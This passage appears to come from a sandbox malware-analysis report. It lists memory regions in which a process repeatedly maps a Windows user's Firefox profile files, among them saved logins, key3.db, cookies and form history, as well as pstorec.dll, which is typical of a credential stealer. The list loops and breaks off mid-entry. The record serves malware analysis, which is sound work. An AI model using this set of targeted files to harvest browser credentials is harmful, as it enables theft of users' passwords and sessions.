entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 5004 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 5005 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js") Region: id = 5006 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 5007 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 5008 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "urlclassifierkey3.txt" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt") Region: id = 5009 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "webapps.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json") Region: id = 5010 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 5011 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "installtime20131025151332" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332") Region: id = 5012 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 5013 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 5014 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 5015 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 5016 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 5017 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 5018 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 5019 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 5020 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 5021 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 5022 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 5023 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 5024 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 5025 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 5026 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 5027 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 5028 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 5029 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 5030 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 5031 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 5032 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 5033 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 5034 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 5035 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 5036 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.js") Region: id = 5037 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 5038 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 5039 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "urlclassifierkey3.txt" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\urlclassifierkey3.txt" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\urlclassifierkey3.txt") Region: id = 5040 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "webapps.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webapps\\webapps.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webapps\\webapps.json") Region: id = 5041 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 5042 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "profiles.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\profiles.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles.ini") Region: id = 5043 start_va = 0x74290000 end_va = 0x7429cfff entry_point = 0x74290000 region_type = mapped_file name = "pstorec.dll" filename = "\\Windows\\SysWOW64\\pstorec.dll" (normalized: "c:\\windows\\syswow64\\pstorec.dll") Region: id = 5044 start_va = 0x737e0000 end_va = 0x737f3fff entry_point = 0x737e0000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\SysWOW64\\atl.dll" (normalized: "c:\\windows\\syswow64\\atl.dll") Region: id = 5045 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5046 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5047 start_va = 0x3800000 end_va = 0x3900fff entry_point = 0x0 region_type = private name = "private_0x0000000003800000" filename = "" Region: id = 5048 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 5049 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 5050 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 5051 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 5052 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 5053 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = "content-prefs.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\content-prefs.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\content-prefs.sqlite") Region: id = 5054 start_va = 0x3800000 end_va = 0x387ffff entry_point = 0x3800000 region_type = mapped_file name = "cookies.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cookies.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cookies.sqlite") Region: id = 5055 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "downloads.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\downloads.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\downloads.sqlite") Region: id = 5056 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "extensions.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.ini") Region: id = 5057 start_va = 0x3680000 end_va = 0x36effff entry_point = 0x3680000 region_type = mapped_file name = "extensions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\extensions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\extensions.sqlite") Region: id = 5058 start_va = 0x450000 end_va = 0x47ffff entry_point = 0x450000 region_type = mapped_file name = "formhistory.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\formhistory.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\formhistory.sqlite") Region: id = 5059 start_va = 0x3800000 end_va = 0x3917fff entry_point = 0x3800000 region_type = mapped_file name = "healthreport.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\healthreport.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\healthreport.sqlite") Region: id = 5060 start_va = 0x3800000 end_va = 0x3a57fff entry_point = 0x3800000 region_type = mapped_file name = "818200132aebmoouht.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\indexedDB\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\indexeddb\\moz-safe-about+home\\idb\\818200132aebmoouht.sqlite") Region: id = 5061 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "key3.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\key3.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\key3.db") Region: id = 5062 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "localstore.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\localstore.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\localstore.rdf") Region: id = 5063 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "marionette.log" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\marionette.log" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\marionette.log") Region: id = 5064 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "mimetypes.rdf" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\mimeTypes.rdf" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\mimetypes.rdf") Region: id = 5065 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "permissions.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\permissions.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\permissions.sqlite") Region: id = 5066 start_va = 0x3800000 end_va = 0x41fffff entry_point = 0x3800000 region_type = mapped_file name = "places.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\places.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\places.sqlite") Region: id = 5067 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "pluginreg.dat" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\pluginreg.dat" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\pluginreg.dat") Region: id = 5068 start_va = 0x450000 end_va = 0x451fff entry_point = 0x450000 region_type = mapped_file name = "prefs.js" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\prefs.js" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\prefs.js") Region: id = 5069 start_va = 0x450000 end_va = 0x454fff entry_point = 0x450000 region_type = mapped_file name = "search.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\search.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\search.json") Region: id = 5070 start_va = 0x450000 end_va = 0x453fff entry_point = 0x450000 region_type = mapped_file name = "secmod.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\secmod.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\secmod.db") Region: id = 5071 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "sessionstore.bak" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\sessionstore.bak" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\sessionstore.bak") Region: id = 5072 start_va = 0x24c0000 end_va = 0x250ffff entry_point = 0x24c0000 region_type = mapped_file name = "signons.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\signons.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\signons.sqlite") Region: id = 5073 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "times.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\times.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\times.json") Region: id = 5074 start_va = 0x450000 end_va = 0x467fff entry_point = 0x450000 region_type = mapped_file name = "webappsstore.sqlite" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\webappsstore.sqlite" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\webappsstore.sqlite") Region: id = 5075 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "installtime20131025151332" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Crash Reports\\InstallTime20131025151332" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\crash reports\\installtime20131025151332") Region: id = 5076 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "addons.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\addons.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\addons.json") Region: id = 5077 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-06-30_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-06-30_5.json") Region: id = 5078 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "bookmarks-2017-07-26_5.json" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\bookmarkbackups\\bookmarks-2017-07-26_5.json") Region: id = 5079 start_va = 0x450000 end_va = 0x45ffff entry_point = 0x450000 region_type = mapped_file name = "cert8.db" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\cert8.db" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\cert8.db") Region: id = 5080 start_va = 0x450000 end_va = 0x450fff entry_point = 0x450000 region_type = mapped_file name = "compatibility.ini" filename = "\\Users\\aETAdzjz\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\3y2joh8o.default\\compatibility.ini" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\mozilla\\firefox\\profiles\\3y2joh8o.default\\compatibility.ini") Region: id = 5081 start_va = 0x450000 end_va = 0x487fff entry_point = 0x450000 region_type = mapped_file name = 